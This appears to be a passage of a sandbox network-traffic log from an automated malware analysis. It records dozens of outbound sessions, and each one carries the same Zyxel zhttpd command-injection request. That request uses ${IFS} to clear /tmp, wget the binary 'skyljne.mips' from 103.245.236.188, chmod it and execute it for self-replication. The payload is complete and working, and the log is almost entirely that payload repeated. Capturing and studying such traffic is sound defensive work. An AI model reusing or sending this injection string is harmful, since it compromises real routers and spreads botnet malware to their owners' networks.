                                                Jan 12, 2024 18:24:48.154726982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7624192.168.2.134321472.239.253.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154787064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7625192.168.2.1345228109.53.180.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154819965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7626192.168.2.134588614.58.100.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154846907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7627192.168.2.135695080.198.85.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154881001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7628192.168.2.134790879.130.109.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154917002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7629192.168.2.1335628221.147.42.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154957056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7630192.168.2.1340726132.1.189.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.154995918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7631192.168.2.1352190196.199.89.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155025005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7632192.168.2.13597481.25.43.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155076981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7633192.168.2.1354880113.117.220.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155097961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7634192.168.2.135670827.145.226.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155145884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7635192.168.2.135735813.206.22.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155209064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7636192.168.2.1360422114.129.162.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155239105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7637192.168.2.1334924137.191.139.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155282021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7638192.168.2.133526034.21.54.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155347109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7639192.168.2.135491664.69.93.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155378103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7640192.168.2.1349092159.146.28.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155424118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7641192.168.2.133538214.33.190.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155474901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7642192.168.2.134673214.152.174.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155520916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7643192.168.2.1352586154.101.173.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155571938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7644192.168.2.136069894.148.207.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155622005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7645192.168.2.134721231.65.131.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155641079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7646192.168.2.13591062.84.5.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155703068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7647192.168.2.1359760120.212.162.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155757904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7648192.168.2.1351762129.243.246.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155798912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7649192.168.2.1354282147.36.4.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155837059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7650192.168.2.1351006142.243.124.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155879974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7651192.168.2.134533639.229.254.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155903101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7652192.168.2.1348242120.211.230.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155936003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7653192.168.2.1344544165.5.77.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.155992031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7654192.168.2.134391445.78.64.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156027079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7655192.168.2.1356050135.203.250.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156054020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7656192.168.2.134776641.209.222.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156131029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7657192.168.2.1344530180.5.117.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156157970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7658192.168.2.1358094212.200.155.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156193972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7659192.168.2.1345420205.38.33.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156249046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7660192.168.2.13375182.244.41.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156300068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7661192.168.2.1335228115.220.95.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156320095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7662192.168.2.135427695.35.240.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.156375885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7663192.168.2.135712894.88.116.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.159544945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7664192.168.2.133397875.76.97.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160232067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7665192.168.2.1337764168.108.3.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160273075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7666192.168.2.1353790129.194.70.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160305023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7667192.168.2.135997253.159.51.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160398960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7668192.168.2.13357781.24.31.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160399914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7669192.168.2.1357806159.74.74.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160454035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7670192.168.2.1347870117.170.215.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160489082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7671192.168.2.1352052134.82.128.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160538912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7672192.168.2.1342374123.185.211.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160578966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7673192.168.2.1342376129.145.232.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160626888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7674192.168.2.1353144207.202.14.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160681963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7675192.168.2.1352222112.215.210.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160727978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7676192.168.2.134969280.222.106.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160748959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7677192.168.2.134885451.53.109.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160793066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7678192.168.2.135325852.252.82.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160832882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7679192.168.2.135391487.89.240.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160866022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7680192.168.2.133769042.183.255.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160900116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7681192.168.2.1351204191.191.239.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160926104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7682192.168.2.135081050.6.226.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.160984993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7683192.168.2.133743814.72.3.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.161011934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7684192.168.2.1335308164.3.225.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:48.161056995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7685192.168.2.1346068223.213.169.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:49.170428038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7686192.168.2.133994450.206.68.68443
                                                TimestampBytes transferredDirectionData
